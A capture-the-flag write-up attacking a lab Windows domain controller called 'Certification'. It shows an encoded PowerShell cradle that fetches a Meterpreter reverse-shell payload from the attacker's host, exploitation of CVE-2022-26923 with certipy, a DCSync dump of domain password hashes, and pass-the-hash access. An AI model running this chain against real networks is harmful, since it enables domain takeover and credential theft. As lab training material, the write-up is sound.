Certification

A Certification Authority has declined our requests to access their data in order to identify a well known APT group. Unfortunately we do not have the jurisdiction to force them to cooperate. For this reason you are tasked with hacking their infrastructure in order to gather information.

Enumeration:

sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp  open  http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57496/tcp open  msrpc         Microsoft Windows RPC
59262/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
64924/tcp open  msrpc         Microsoft Windows RPC

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126

SMB         10.129.230.126  445    CFN-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)

Visit http://10.129.230.126:8000/ and login with admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered through different events, e.g., Before Rename.

Preparation:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1

nano Public/bp-simple-runim64.ps1

echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA

cd Public/
sudo python3 -m http.server 80

Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive Meterpreter session.

meterpreter > cat user.txt

HTB{Abu51ng_F34tur3s_4r3_fun}

Nice. Discover user credentials:

meterpreter > cat applist.ps1

$user = "daniel.morgan"
$pass = "FDOnolk(naws)"

Challenge hints to ADCS. A recent vulnerability is presented here:

https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4

Enumeration:

certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'

...
Template Name                       : Machine
Certificate Authorities             : certification-CFN-SVRDC01-CA
Enabled                             : True
Client Authentication               : True
Enrollee Supplies Subject           : False
Certificate Name Flag               : SubjectRequireDnsAsCn
                                      SubjectAltRequireDns
Enrollment Flag                     : AutoEnrollment
Extended Key Usage                  : Client Authentication
                                      Server Authentication
Requires Manager Approval           : False
Application Policies                : 
Authorized Signatures Required      : 0
Validity Period                     : 1 year
Renewal Period                      : 6 weeks
Permissions
  Enrollment Permissions
    Enrollment Rights               : CERTIFICATION.HTB\Domain Admins
                                      CERTIFICATION.HTB\Domain Computers
                                      CERTIFICATION.HTB\Enterprise Admins
...

Looks good! Exploitation:

sudo nano /etc/hosts

10.129.224.146  CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb

(IP address has changed due to reboots)

Create a new machine account wtf$ and use the flag -dns to abuse CVE-2022–26923.

certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)

Password:
[*] Creating new account:
    sAMAccountName                      : wtf$
    unicodePwd                          : J6AeabTzuSGNFElP
    userAccountControl                  : 4096
    servicePrincipalName                : HOST/wtf
                                          RestrictedKrbHost/wtf
    dnsHostName                         : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'

Now request certificate. Only difference to blog post is the flag -dynamic-endpoint (did not work without it).

certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'

Use certificate to retrieve NT hash for domain controller:

certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a

DCSync:

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds

SMB         10.129.224.146  445    CFN-SVRDC01      [+] Dumping the NTDS, this could take a while so go grab a redbull...

SMB         10.129.224.146  445    CFN-SVRDC01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB         10.129.224.146  445    CFN-SVRDC01      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.224.146  445    CFN-SVRDC01      krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB         10.129.224.146  445    CFN-SVRDC01      daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB         10.129.224.146  445    CFN-SVRDC01      SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB         10.129.224.146  445    CFN-SVRDC01      wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::

Collect flag:

impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb

# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt

HTB{c3rtif1c4t35_c4n_8e_f4k3d}

Excellent.